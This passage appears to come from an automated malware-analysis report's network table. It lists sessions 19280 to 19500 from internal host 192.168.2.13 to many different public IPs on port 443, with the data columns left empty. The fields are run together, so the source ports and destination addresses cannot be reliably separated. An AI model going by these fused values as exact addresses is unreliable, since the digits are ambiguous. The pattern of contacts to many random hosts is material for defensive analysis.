                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19280192.168.2.13539548.56.21.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19281192.168.2.1360580180.243.26.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19282192.168.2.135478214.33.98.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19283192.168.2.1344686162.63.1.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19284192.168.2.1341614114.50.168.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19285192.168.2.1336950171.145.128.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19286192.168.2.1359764122.76.47.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19287192.168.2.1356586124.109.198.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19288192.168.2.1334038160.135.132.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19289192.168.2.1343042217.203.15.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19290192.168.2.1342676223.231.223.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19291192.168.2.1335854212.189.245.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19292192.168.2.134161693.229.13.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19293192.168.2.1349970179.83.102.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19294192.168.2.1346540181.170.16.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19295192.168.2.1345082144.140.122.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19296192.168.2.134383468.232.18.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19297192.168.2.1347836136.241.13.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19298192.168.2.134871488.195.143.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19299192.168.2.134917412.151.109.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19300192.168.2.135957458.193.75.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19301192.168.2.134488445.19.70.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19302192.168.2.134465896.224.120.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19303192.168.2.1358988222.38.96.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19304192.168.2.135658249.14.175.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19305192.168.2.134240481.27.199.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19306192.168.2.134190672.146.191.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19307192.168.2.135887658.63.229.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19308192.168.2.134693812.133.166.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19309192.168.2.133896884.137.73.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19310192.168.2.1359614205.167.97.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19311192.168.2.135675644.15.173.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19312192.168.2.1350856172.220.202.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19313192.168.2.135083497.30.212.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19314192.168.2.1346342137.154.100.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19315192.168.2.1333874167.255.68.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19316192.168.2.1353984156.57.47.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19317192.168.2.134700496.131.151.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19318192.168.2.1335002112.143.198.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19319192.168.2.1352962147.47.201.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19320192.168.2.135957241.19.183.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19321192.168.2.1335272217.186.189.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19322192.168.2.1343194133.60.212.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19323192.168.2.1341238124.12.35.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19324192.168.2.135449850.170.233.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19325192.168.2.1356418194.71.186.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19326192.168.2.135068696.189.108.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19327192.168.2.1342052113.125.250.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19328192.168.2.1343102151.85.249.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19329192.168.2.1360524102.8.151.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19330192.168.2.1347878143.70.255.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19331192.168.2.1351008163.40.123.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19332192.168.2.1356478158.204.74.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19333192.168.2.135811447.66.108.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19334192.168.2.1337964162.40.244.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19335192.168.2.1353436113.194.182.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19336192.168.2.1349106189.131.35.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19337192.168.2.133738831.25.255.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19338192.168.2.1340292132.168.201.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19339192.168.2.13504942.11.160.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19340192.168.2.1355296116.120.123.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19341192.168.2.1347478149.48.48.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19342192.168.2.1333632172.114.25.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19343192.168.2.1357662137.4.29.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19344192.168.2.1340106150.25.103.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19345192.168.2.134065017.100.199.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19346192.168.2.1336182153.204.238.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19347192.168.2.134173412.151.181.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19348192.168.2.1348488109.50.164.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19349192.168.2.1343288156.109.255.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19350192.168.2.135571027.163.199.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19351192.168.2.1336230136.186.109.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19352192.168.2.1349694220.225.14.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19353192.168.2.1351044150.161.143.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19354192.168.2.135343287.75.11.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19355192.168.2.1335912203.121.183.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19356192.168.2.1349180148.195.173.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19357192.168.2.1333136210.225.61.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19358192.168.2.1358398143.196.169.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19359192.168.2.1342064140.201.167.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19360192.168.2.1343736114.95.142.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19361192.168.2.1335430195.129.107.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19362192.168.2.1354426165.58.234.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19363192.168.2.1339402168.243.143.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19364192.168.2.1340634140.129.110.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19365192.168.2.1358084116.244.196.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19366192.168.2.1333038190.208.61.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19367192.168.2.134755085.240.187.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19368192.168.2.1334368139.39.204.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19369192.168.2.1352022175.167.202.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19370192.168.2.1351478175.184.157.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19371192.168.2.133950236.31.79.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19372192.168.2.1337046121.186.22.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19373192.168.2.133894475.99.29.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19374192.168.2.1359696182.216.17.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19375192.168.2.133517631.175.197.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19376192.168.2.1354324150.240.225.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19377192.168.2.1333576107.195.169.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19378192.168.2.1350136204.157.46.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19379192.168.2.1344334163.19.229.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19380192.168.2.1347040133.24.175.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19381192.168.2.134302087.91.245.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19382192.168.2.134819650.74.226.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19383192.168.2.134968023.207.125.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19384192.168.2.133680062.226.215.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19385192.168.2.1340734109.152.195.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19386192.168.2.1343794151.8.90.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19387192.168.2.1345372108.32.141.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19388192.168.2.1350758223.235.128.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19389192.168.2.1346710216.64.57.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19390192.168.2.1353186148.252.16.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19391192.168.2.135783641.162.233.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19392192.168.2.133959865.144.94.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19393192.168.2.1341870199.42.176.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19394192.168.2.1359586112.253.131.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19395192.168.2.134138863.111.9.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19396192.168.2.1350470200.247.230.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19397192.168.2.134045668.236.241.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19398192.168.2.1334160124.154.172.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19399192.168.2.1338768120.246.190.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19400192.168.2.134845680.193.120.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19401192.168.2.1352320149.137.78.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19402192.168.2.1359110180.111.213.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19403192.168.2.134753282.193.172.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19404192.168.2.136028481.24.229.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19405192.168.2.1357490183.48.235.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19406192.168.2.1345482212.246.255.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19407192.168.2.1333480162.132.78.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19408192.168.2.1338626122.81.42.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19409192.168.2.1334386216.10.200.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19410192.168.2.133529097.2.188.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19411192.168.2.1338654206.110.51.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19412192.168.2.1352434107.55.150.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19413192.168.2.133816837.83.18.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19414192.168.2.1340624163.225.218.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19415192.168.2.1348334161.72.99.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19416192.168.2.133402476.68.165.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19417192.168.2.134441263.194.68.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19418192.168.2.133882258.252.159.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19419192.168.2.1353996211.118.100.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19420192.168.2.1360444124.104.30.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19421192.168.2.1360298108.244.201.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19422192.168.2.134105272.14.98.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19423192.168.2.135450093.124.74.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19424192.168.2.135909647.254.199.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19425192.168.2.1360240170.160.158.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19426192.168.2.1341506155.80.51.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19427192.168.2.1346158130.22.162.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19428192.168.2.1354418103.101.149.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19429192.168.2.1346138200.84.215.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19430192.168.2.135254844.206.124.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19431192.168.2.1343080112.114.243.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19432192.168.2.134792474.146.240.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19433192.168.2.1352912134.241.183.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19434192.168.2.1333302162.76.6.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19435192.168.2.1355546186.63.124.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19436192.168.2.1333028168.100.250.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19437192.168.2.133464693.36.200.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19438192.168.2.1360164129.175.123.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19439192.168.2.135017892.222.206.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19440192.168.2.1353604161.65.158.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19441192.168.2.1339378192.141.144.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19442192.168.2.134336052.235.113.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19443192.168.2.134222458.227.131.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19444192.168.2.135613661.32.1.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19445192.168.2.135251813.227.174.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19446192.168.2.1336000124.81.29.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19447192.168.2.133986817.112.51.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19448192.168.2.1350276204.187.65.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19449192.168.2.1353804176.17.116.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19450192.168.2.1336062102.23.96.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19451192.168.2.1352210186.99.153.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19452192.168.2.1355654200.201.149.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19453192.168.2.135954262.254.204.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19454192.168.2.1348864172.128.229.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19455192.168.2.13537948.19.153.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19456192.168.2.1347866125.214.198.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19457192.168.2.135661094.201.78.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19458192.168.2.1341240157.228.105.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19459192.168.2.134933066.108.55.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19460192.168.2.1343440100.235.21.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19461192.168.2.1356074197.82.215.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19462192.168.2.134305838.136.85.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19463192.168.2.1341994219.99.66.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19464192.168.2.1353352118.74.141.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19465192.168.2.133738675.80.242.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19466192.168.2.135520070.146.114.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19467192.168.2.1333174212.228.82.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19468192.168.2.1333170153.100.45.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19469192.168.2.1336862157.61.131.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19470192.168.2.1353520129.49.34.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19471192.168.2.1341124121.206.177.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19472192.168.2.133336020.52.183.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19473192.168.2.1346480171.90.37.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19474192.168.2.133577652.112.142.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19475192.168.2.1343690199.87.11.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19476192.168.2.1355210184.23.251.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19477192.168.2.135821213.246.56.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19478192.168.2.134597220.67.160.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19479192.168.2.1351112159.213.125.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19480192.168.2.1357546204.40.51.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19481192.168.2.135342043.35.46.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19482192.168.2.1357284197.160.70.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19483192.168.2.135576014.120.118.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19484192.168.2.133338843.160.202.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19485192.168.2.1354354181.208.127.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19486192.168.2.1332896201.13.115.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19487192.168.2.1347316111.171.97.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19488192.168.2.134893446.123.35.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19489192.168.2.1334720152.228.89.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19490192.168.2.1351788145.46.175.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19491192.168.2.133413064.143.42.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19492192.168.2.1339542108.243.202.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19493192.168.2.1343698128.111.39.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19494192.168.2.1336164168.131.235.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19495192.168.2.133477271.195.136.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19496192.168.2.1338424168.164.123.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19497192.168.2.1356358220.193.189.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19498192.168.2.1356072121.110.65.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19499192.168.2.135978865.215.156.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19500192.168.2.134914872.189.126.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
